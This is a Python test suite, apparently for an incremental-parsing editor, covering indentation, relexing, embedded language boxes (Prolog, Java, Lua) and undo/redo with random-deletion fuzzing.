self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_opt_push_last_before_eos_2(self):
self.reset()
inputstring = """class X:\r def x():\r pass\rdef y():\r pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 3)
# insert whitespace before def y()
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_and_any_symbol(self):
# when making a line unlogical, need to mark all newlines afterwards as changed
# ??? only mark the first and last line as changed, and update the indent-attribute on all other <return>
self.reset()
inputstring = """def x():
if x:
x = \"\"\"
string
else:
y"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == False
self.move(DOWN, 3)
self.treemanager.key_end()
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
assert self.parser.last_status == True
def test_indentation_bug(self):
self.reset()
inputstring = """class X:
def x():
pass
def z():
pass
x()"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 1)
self.move(RIGHT, 4)
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_bug2(self):
self.reset()
inputstring = """class X:
def y():
if x:
def x():
pass
x()
"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 3)
self.treemanager.key_end()
self.treemanager.key_normal("p")
assert self.parser.last_status == False
self.move(DOWN, 1)
self.move(LEFT, 4)
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_bug3(self):
self.reset()
inputstring = """def x():
pass
x()
"""
for k in inputstring:
self.treemanager.key_normal(k)
self.move(UP, 2)
self.treemanager.key_home()
assert self.parser.last_status == True
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
def test_indentation_multiline_bug(self):
self.reset()
inputstring = """class X:
def x():
s = 2
pass1
def x():
pass2
def z():
z"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 4)
self.treemanager.key_end()
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.move(UP, 2)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
assert self.parser.last_status == True
# remove quotes again
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.move(DOWN, 2)
self.treemanager.key_end()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_comment(self):
self.reset()
inputstring = """class X:
# test
pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
def test_indentation_reuse(self):
self.reset()
for c in """class X:\n """:
self.treemanager.key_normal(c)
newline = self.treemanager.cursor.node.next_term
assert newline.symbol.name == "NEWLINE"
self.treemanager.key_normal("p")
newline2 = self.treemanager.cursor.node.next_term
assert newline2.symbol.name == "NEWLINE"
assert newline is newline2
class Test_Incremental_AST(Test_Python):
def test_simple(self):
self.reset()
self.treemanager.import_file("def x():\n pass")
root = self.parser.previous_version.parent
funcdef = root.children[1].children[1].children[0].children[0].children[0].children[0]
assert funcdef.symbol.name == "funcdef"
assert funcdef.alternate.name == "FuncDef"
def test_reuse(self):
self.reset()
self.treemanager.import_file("def x():\n pass")
root = self.parser.previous_version.parent
funcdef = root.children[1].children[1].children[0].children[0].children[0].children[0]
assert funcdef.symbol.name == "funcdef"
assert funcdef.alternate.name == "FuncDef"
oldastnode = funcdef.alternate
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("2")
newfuncdef = root.children[1].children[1].children[0].children[0].children[0].children[0]
assert newfuncdef is funcdef
assert newfuncdef.alternate is oldastnode
class Test_Relexing(Test_Python):
def test_dont_stop_relexing_after_first_error(self):
self.reset()
inputstring = """def x():
1
def y():
2"""
for c in inputstring:
self.treemanager.key_normal(c)
# create 1st lexing error
self.treemanager.cursor_movement(UP)
self.treemanager.cursor_movement(UP)
self.treemanager.cursor_movement(UP)
self.treemanager.key_end()
self.treemanager.key_normal("*")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
# create 2nd lexing error
self.treemanager.cursor_movement(DOWN)
self.treemanager.cursor_movement(DOWN)
self.treemanager.cursor_movement(DOWN)
self.treemanager.key_end()
self.treemanager.key_normal("+")
self.treemanager.key_normal("3")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
assert type(self.treemanager.cursor.node.parent) is MultiTextNode
def test_lexingerror_bug(self):
self.reset()
self.treemanager.pasteText("""def x():
x = 1\"\"\"
""")
assert self.parser.last_status is False
self.move(UP, 3)
self.treemanager.key_end()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status is True
def test_newline_after_error(self):
self.reset()
for c in " $x=1;\n":
self.treemanager.key_normal(c)
assert self.parser.last_status is False
# Check that the node `\n ` has been split up
assert self.treemanager.cursor.node.symbol.name == " "
class Test_NestedLboxWithIndentation():
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def reset(self):
self.parser.reset()
self.treemanager = TreeManager()
self.treemanager.add_parser(self.parser, self.lexer, calc.name)
self.treemanager.set_font_test(7, 17)
def test_simple(self):
inputstring = "1+"
for c in inputstring:
self.treemanager.key_normal(c)
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
inputstring = "def x():\r pass"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.treemanager.parsers[1][2] == "Python 2.7.5"
assert self.treemanager.parsers[1][0].last_status == True
def test_remove_empty_lbox(self):
# whitespace sensitive languages still contain indentation tokens when they are "empty"
self.reset()
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
self.treemanager.key_normal("a")
self.treemanager.key_backspace()
assert isinstance(self.treemanager.cursor.node, BOS)
assert isinstance(self.treemanager.cursor.node.next_term, EOS)
def test_remove_empty_lbox2(self):
# whitespace sensitive languages still contain indentation tokens when they are "empty"
self.reset()
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
self.treemanager.key_normal("a")
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.deleteSelection()
assert isinstance(self.treemanager.cursor.node, BOS)
assert isinstance(self.treemanager.cursor.node.next_term, EOS)
#from grammars.grammars import lang_dict, python_prolog
class Test_Languageboxes(Test_Python):
def setup_class(cls):
parser, lexer = pythonprolog.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, pythonprolog.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_simple(self):
assert self.parser.last_status == True
inputstring = "class Test:\r def x():\r return x"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_backspace()
assert self.parser.last_status == True
self.treemanager.add_languagebox(lang_dict["Prolog"])
assert self.parser.last_status == True
assert self.treemanager.parsers[1][2] == "Prolog"
assert self.treemanager.parsers[1][0].last_status == False
self.treemanager.key_normal("x")
assert self.treemanager.parsers[1][0].last_status == False
self.treemanager.key_normal(".")
assert self.treemanager.parsers[1][0].last_status == True
def test_backspace_return_in_box(self):
self.reset()
inputstring = "class Test:\r def x():\r return x"
for c in inputstring:
self.treemanager.key_normal(c)
self.treemanager.key_backspace()
self.treemanager.add_languagebox(lang_dict["Prolog"])
self.treemanager.key_normal("x")
self.treemanager.key_normal("\r")
for i in range(8):
self.treemanager.key_backspace()
def test_lbox_skips_newline(self):
# when inserting a languagebox at the line beginning the next token
# skips NEWLINE tokens. It should only skip INDENT/DEDENT
self.reset()
self.treemanager.key_normal("a") # needs to be valid once
assert self.treemanager.parsers[0][0].last_status == True
self.treemanager.key_backspace()
self.treemanager.add_languagebox(lang_dict["Prolog"])
self.treemanager.key_normal("a")
self.treemanager.key_normal(".")
self.treemanager.leave_languagebox()
self.treemanager.key_normal(".")
self.treemanager.key_normal("x")
assert self.treemanager.parsers[0][0].last_status == True
def test_delete_selection(self):
self.reset()
for c in "a = 1":
self.treemanager.key_normal(c)
self.treemanager.key_normal("\r")
self.treemanager.add_languagebox(lang_dict["Prolog"])
lbox = self.treemanager.cursor.node.get_root().get_magicterminal()
assert lbox.symbol.name == "<Prolog>"
for c in "abc def":
self.treemanager.key_normal(c)
self.treemanager.key_cursors(LEFT)
# select "bc de"
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.deleteSelection()
assert lbox.symbol.name == "<Prolog>"
def test_auto_indent(self):
self.reset()
self.treemanager.add_languagebox(lang_dict["Prolog"])
for c in "abc:\r def":
self.treemanager.key_normal(c)
self.treemanager.leave_languagebox()
self.treemanager.key_normal("\r")
self.treemanager.key_normal("a")
assert self.treemanager.export_as_text() == "abc:\n def\na"
def test_auto_indent2(self):
self.reset()
self.treemanager.add_languagebox(lang_dict["Prolog"])
for c in "abc:\r def":
self.treemanager.key_normal(c)
self.treemanager.key_normal("\r")
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
for c in "def x():\r pass":
self.treemanager.key_normal(c)
self.treemanager.leave_languagebox()
self.treemanager.key_normal("\r")
self.treemanager.key_normal("a")
assert self.treemanager.export_as_text() == "abc:\n def\n def x():\n pass\n a"
def test_java_python_dont_lex_lboxes(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1 * 2;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
treemanager.add_languagebox(lang_dict["Python expression"])
treemanager.key_normal("1")
assert treemanager.cursor.node.get_root().magic_backpointer.lookup == ""
assert len(treemanager.parsers) == 2
assert parser.last_status is True
class Test_Backslash(Test_Python):
def test_parse(self):
self.reset()
program = """class X:\r def x():\r return \\\r [1,2,3]"""
for c in program:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
def test_parse_fail(self):
self.reset()
program = """class X:\r def x():\r return \\ \r [1,2,3]"""
for c in program:
self.treemanager.key_normal(c)
assert self.parser.last_status == False
def test_parse_delete_insert(self):
self.reset()
program = """class X:\r def x():\r return \\\r [1,2,3]"""
for c in program:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(UP, 1)
self.treemanager.key_end()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_normal("\\")
assert self.parser.last_status == True
class Test_Java:
def setup_class(cls):
parser, lexer = java.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, java.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def reset(self):
self.parser.reset()
self.treemanager = TreeManager()
self.treemanager.add_parser(self.parser, self.lexer, python.name)
self.treemanager.set_font_test(7, 17)
def move(self, direction, times):
for i in range(times): self.treemanager.cursor_movement(direction)
class Test_JavaBugs(Test_Java):
def test_incparse_optshift_bug(self):
prog = """class Test {\r public static void main() {\r String y = z;\r }\r}"""
for c in prog:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(LEFT, 1)
self.move(UP, 3)
self.treemanager.key_end()
self.treemanager.key_normal("\r")
for c in "int x = 1;":
self.treemanager.key_normal(c)
assert self.parser.last_status == True
def test_cursor_jumping_bug(self):
self.reset()
prog = "x = 1 + 2"
for c in prog:
self.treemanager.key_normal(c)
self.treemanager.key_home()
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_normal("\"")
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_normal("\"")
assert self.treemanager.cursor.node.symbol.name == "\"1 \""
def test_inclexing_bug(self):
self.reset()
prog = """class C {
int x = cur;
/*
*/
/*
*/
int x = '+';
}"""
self.treemanager.import_file(prog)
self.move(DOWN, 1)
self.move(RIGHT, 16)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_normal("'")
def test_cursor_jumping_bug2(self):
self.reset()
prog = """class C {
int x = 1;
}"""
self.treemanager.import_file(prog)
self.move(DOWN, 1)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_backspace()
self.treemanager.add_languagebox(lang_dict["Basic Calculator"])
self.treemanager.key_normal("1")
self.treemanager.leave_languagebox()
self.treemanager.key_normal(" ")
assert self.treemanager.cursor.node.symbol.name == " "
class Test_Lua:
def setup_class(cls):
parser, lexer = lua.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, java.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_comment(self):
prog = """--[[cmt\rcmt\ncmt]]\rx = {}"""
for c in prog:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
class Test_Undo(Test_Python):
def reset(self):
Test_Python.reset(self)
self.treemanager.version = 1
self.treemanager.last_saved_version = 1
def compare(self, text):
import tempfile
f = tempfile.NamedTemporaryFile()
result = self.treemanager.export_as_text("/tmp/temp.py")
assert result == text
f.close()
def type_save(self, text):
self.treemanager.key_normal(text)
self.treemanager.undo_snapshot() # tells treemanager to save after the next operation and increase the version
def save(self):
self.treemanager.version += 1
self.treemanager.save()
def test_simple_undo_redo(self):
self.treemanager.key_normal("1")
self.treemanager.undo_snapshot()
self.treemanager.key_normal("+")
self.treemanager.undo_snapshot()
self.treemanager.key_normal("2")
self.compare("1+2")
self.treemanager.key_ctrl_z()
self.compare("1+")
self.treemanager.key_ctrl_z()
self.compare("1")
self.treemanager.key_ctrl_z()
self.compare("")
self.treemanager.key_shift_ctrl_z()
self.compare("1")
self.treemanager.key_shift_ctrl_z()
self.compare("1+")
self.treemanager.key_shift_ctrl_z()
self.compare("1+2")
def test_undo_indentation(self):
self.reset()
self.type_save("class")
self.type_save(" X:")
self.type_save("\r ")
self.type_save("pass")
self.compare("class X:\n pass")
self.treemanager.key_ctrl_z()
self.compare("class X:\n ")
self.treemanager.key_ctrl_z()
self.compare("class X:")
# with the new indentation that NEWLINE is only added after a successful parse
#assert self.treemanager.cursor.node.next_term.symbol.name == "NEWLINE"
#assert isinstance(self.treemanager.cursor.node.next_term.next_term, EOS)
self.treemanager.key_ctrl_z()
self.compare("class")
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.compare("class X:\n pass")
assert self.treemanager.cursor.node.next_term.symbol.name == "NEWLINE"
assert self.treemanager.cursor.node.next_term.next_term.symbol.name == "DEDENT"
assert isinstance(self.treemanager.cursor.node.next_term.next_term.next_term, EOS)
def test_undo_and_type(self):
self.reset()
self.type_save("12")
self.type_save("+")
self.type_save("34")
self.compare("12+34")
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.compare("12")
self.type_save("-56")
self.compare("12-56")
self.treemanager.key_shift_ctrl_z()
self.compare("12-56")
def test_redo_bug(self):
self.reset()
self.type_save("1")
self.type_save("\r")
self.type_save("2")
self.move(UP, 1)
self.compare("1\n2")
self.type_save("\r")
self.type_save("3")
self.compare("1\n3\n2")
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.compare("1")
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.compare("1\n3\n2")
self.move(DOWN, 1)
self.treemanager.key_backspace()
self.compare("1\n3\n")
self.treemanager.key_backspace()
self.compare("1\n3")
self.treemanager.key_backspace()
self.compare("1\n")
self.treemanager.key_backspace()
self.compare("1")
def test_redo_bug2(self):
self.reset()
self.type_save("1")
self.type_save("+")
self.type_save("2")
self.move(LEFT, 2)
self.compare("1+2")
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.compare("12")
self.treemanager.key_ctrl_z()
self.compare("1+2")
self.treemanager.key_ctrl_z()
self.compare("1+")
self.treemanager.key_ctrl_z()
self.compare("1")
self.treemanager.key_shift_ctrl_z()
self.compare("1+")
self.treemanager.key_shift_ctrl_z()
self.compare("1+2")
self.treemanager.key_shift_ctrl_z()
self.compare("12")
def test_bug_lingering_nodes(self):
self.reset()
p = """class X:
def foo():
return 23"""
self.treemanager.import_file(p)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("s")
self.treemanager.undo_snapshot()
dp = self.copy()
self.move(DOWN, 2)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("+")
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.text_compare("""class Xs:
def foo():
return 23""")
self.tree_compare(self.parser.previous_version.parent, dp)
def test_bug_lingering_after_redo(self):
self.reset()
p = """class X:
def x():
pass
def y():
pass"""
ast = self.parser.previous_version
self.treemanager.import_file(p)
imp = self.copy()
imptext = self.treemanager.export_as_text()
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
a = self.copy()
atext = self.treemanager.export_as_text()
self.move(DOWN, 1)
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("b")
self.treemanager.undo_snapshot()
b = self.copy()
btext = self.treemanager.export_as_text()
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("c")
self.treemanager.undo_snapshot()
#c = self.copy()
ctext = self.treemanager.export_as_text()
self.move(DOWN, 2)
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("d")
self.treemanager.undo_snapshot()
#d = self.copy()
dtext = self.treemanager.export_as_text()
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("e")
self.treemanager.undo_snapshot()
#e = self.copy()
etext = self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.text_compare(etext)
self.treemanager.key_ctrl_z()
self.text_compare(dtext)
self.treemanager.key_ctrl_z()
self.text_compare(ctext)
self.treemanager.key_ctrl_z()
self.text_compare(btext)
self.treemanager.key_ctrl_z()
self.text_compare(atext)
self.treemanager.key_ctrl_z()
self.text_compare(imptext)
def text_compare(self, original):
original = original.replace("\r", "").split("\n")
current = self.treemanager.export_as_text("/dev/null").replace("\r", "").split("\n")
for i in range(len(current)):
assert original[i] == current[i]
def copy(self):
import copy
return copy.deepcopy(self.parser.previous_version.parent)
def test_import(self):
self.reset() # saves automatically
self.treemanager.import_file("class X:\n def x():\n pass") # saves automatically
self.move(DOWN, 2)
self.treemanager.key_end()
self.treemanager.key_normal("1")
self.compare("class X:\n def x():\n pass1")
self.treemanager.key_ctrl_z()
self.compare("class X:\n def x():\n pass")
def test_overflow(self):
self.reset() # this saves the inital version as 1
self.treemanager.import_file("class X:\n def x():\n pass")
min_version = self.treemanager.version
max_version = self.treemanager.version
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
assert self.treemanager.version == min_version
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
assert self.treemanager.version == max_version
@slow
def test_undo_random_deletion_short(self):
import random
self.reset()
program = """class Connect4(object):
UI_DEPTH = 5 # lookahead for minimax
def __init__(self, p1_is_ai, p2_is_ai):
self.top = tk.Tk()
self.top.title("Unipycation: Connect 4 GUI (Python)")
def _set_status_text(self, text):
self.status_text["text"] = text
def _update_from_pos_one_colour(self, pylist, colour):
assert colour in ["red", "yellow"]
for c in pylist:
assert c.name == "c"
(x, y) = c
self.cols[x][y]["background"] = colour"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(10))
random.shuffle(cols)
for col in cols:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
self.move(DOWN, linenr)
print("self.move(DOWN, %s)" % linenr)
self.move(RIGHT, col)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
def test_undo_random_deletion_short_bug1(self):
self.reset()
program = """class Connect4(object):
UI_DEPTH = 5 # lookahead for minimax
def __init__(self, p1_is_ai, p2_is_ai):
self.top = tk.Tk()
self.top.title("Unipycation: Connect 4 GUI (Python)")
def _set_status_text(self, text):
self.status_text["text"] = text
def _update_from_pos_one_colour(self, pylist, colour):
assert colour in ["red", "yellow"]
for c in pylist:
assert c.name == "c"
(x, y) = c
self.cols[x][y]["background"] = colour"""
self.treemanager.import_file(program)
self.treemanager.cursor_reset()
self.move(DOWN, 13)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.move(LEFT, 3)
self.treemanager.key_delete()
self.move(LEFT, 1)
self.treemanager.key_delete()
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.move(LEFT, 4)
self.treemanager.key_delete()
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.move(LEFT, 5)
self.treemanager.key_delete()
self.move(RIGHT, 9)
self.treemanager.key_delete()
self.move(LEFT, 7)
self.treemanager.key_delete()
self.move(RIGHT, 4)
self.treemanager.key_delete()
def test_undo_random_deletion_fast(self):
# fast fuzzy test that can be run on normal test runs
import random
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.text_compare(programs.pythonsmall)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols[:5]:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
self.move(DOWN, linenr)
print("self.move(DOWN, %s)" % linenr)
self.move(RIGHT, col)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
t1 = TreeManager()
parser, lexer = python.load()
parser.init_ast()
t1.add_parser(parser, lexer, python.name)
t1.set_font_test(7, 17)
t1.import_file(programs.pythonsmall)
assert self.parser.last_status == True
assert parser.last_status == True
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
@slow
def test_undo_random_deletion(self):
import random
self.reset()
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
self.text_compare(programs.connect4)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
self.move(DOWN, linenr)
print("self.move(DOWN, %s)" % linenr)
self.move(RIGHT, col)
print("self.move(RIGHT, %s)" % col)
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
if x == "eos":
continue
self.treemanager.undo_snapshot()
print("self.treemanager.undo_snapshot()")
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
t1 = TreeManager()
parser, lexer = python.load()
parser.init_ast()
t1.add_parser(parser, lexer, python.name)
t1.set_font_test(7, 17)
t1.import_file(programs.connect4)
assert self.parser.last_status == True
assert parser.last_status == True
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_undo_random_deletion_bug1(self):
self.reset()
src = """class X:
def _end(self, winner_colour=None):
for i in self.insert_buttons:
i["state"] = tk.DISABLED
"""
self.treemanager.import_file(src)
assert self.parser.last_status == True
self.text_compare(src)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 12)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 19)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(src)
def test_undo_random_deletion_bug2(self):
self.reset()
self.treemanager.import_file("""class Connect4(object):
UI_DEPTH = 5
def __init__():
self.top = 1
self.top.title()
self.pl_engine = 2
self.turn = None
self.ai_players = 3
self.cols = []
self.insert_buttons = []
def _set_status_text():
self.status_text = 4""")
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 14)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 16)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 15)
self.treemanager.key_delete() # infinite loop
def test_undo_random_deletion_bug3(self):
self.reset()
program = """class Connect4():
pass
def __init__():
pass
for x in y:
pass
for x in y:
pass
pass
pass
pass
def _end():
if winner_colour:
pass
pass"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 16)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 15)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 2)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 16)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 1)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
